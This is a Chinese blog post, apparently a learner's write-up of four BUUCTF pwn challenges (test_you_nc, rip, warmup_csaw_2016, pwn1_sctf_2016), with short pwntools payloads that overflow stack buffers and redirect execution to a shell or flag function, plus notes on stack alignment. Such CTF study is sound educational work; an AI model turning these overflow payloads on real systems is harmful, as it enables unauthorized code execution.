美文网首页
【pwn学习】buuctf pwn题目(一)

【pwn学习】buuctf pwn题目(一)

作者: ckj123 | 来源:发表于2020-08-26 00:54 被阅读0次

test_you_nc

进去看main里面就是sh



所以nc就好


rip

checksec一下发现是64位



看一下代码没有任何过滤直接一个rop应该就行了



有个fun函数直接就有sh了,就跳过去就好了

payload

system_addr = 0x0401186
payload = flat(
    'A'*15, 0, system_addr
)
cn.sendline(payload)
cn.interactive()

奇怪的是
system_addr = 0x0401186
打到远程的话会报错本地没有问题


报错原因百度了一下好像是因为栈出问题了
http://blog.eonew.cn/archives/958
少个push就没问题了
所以最后payload
system_addr = 0x0401187
payload = flat(
    'A'*15, 0, system_addr
)
cn.sendline(payload)
cn.interactive()

主要是2.27的system多了一个movaps需要对齐rsp

warmup_csaw_2016

先checksec一下文件



反编译一下
sub_40060D就是一个system地址所以只要跳过去就好了
感觉比上一个简单



这次学乖了多了一个1

pwn1_sctf_2016


32位的
还是反编译先
好像是c++有点难度了



居然没有栈溢出了震惊

难道是格式化字符串?



有个getflag的函数
估计跳过去就行可是怎么跳呢



FUZZ了一下会把I变成you
很多个i变成you就会产生溢出

所以需要溢出0x3C
还有4个ebp
然后加上那个flag的return地址就好啦



60个好像不行啊奇怪
debug了一下

在这里发生了栈溢出

0x3c是60
所以要放20个i
就会有60个布满了
所以payload


z('b*0x080492BF')
system_addr = 0x08048F0E
payload = flat('I'*20,'0'*4,system_addr)

cn.sendline(payload)
cn.interactive()

相关文章

网友评论

      本文标题:【pwn学习】buuctf pwn题目(一)

      本文链接:https://www.haomeiwen.com/subject/mtjtsktx.html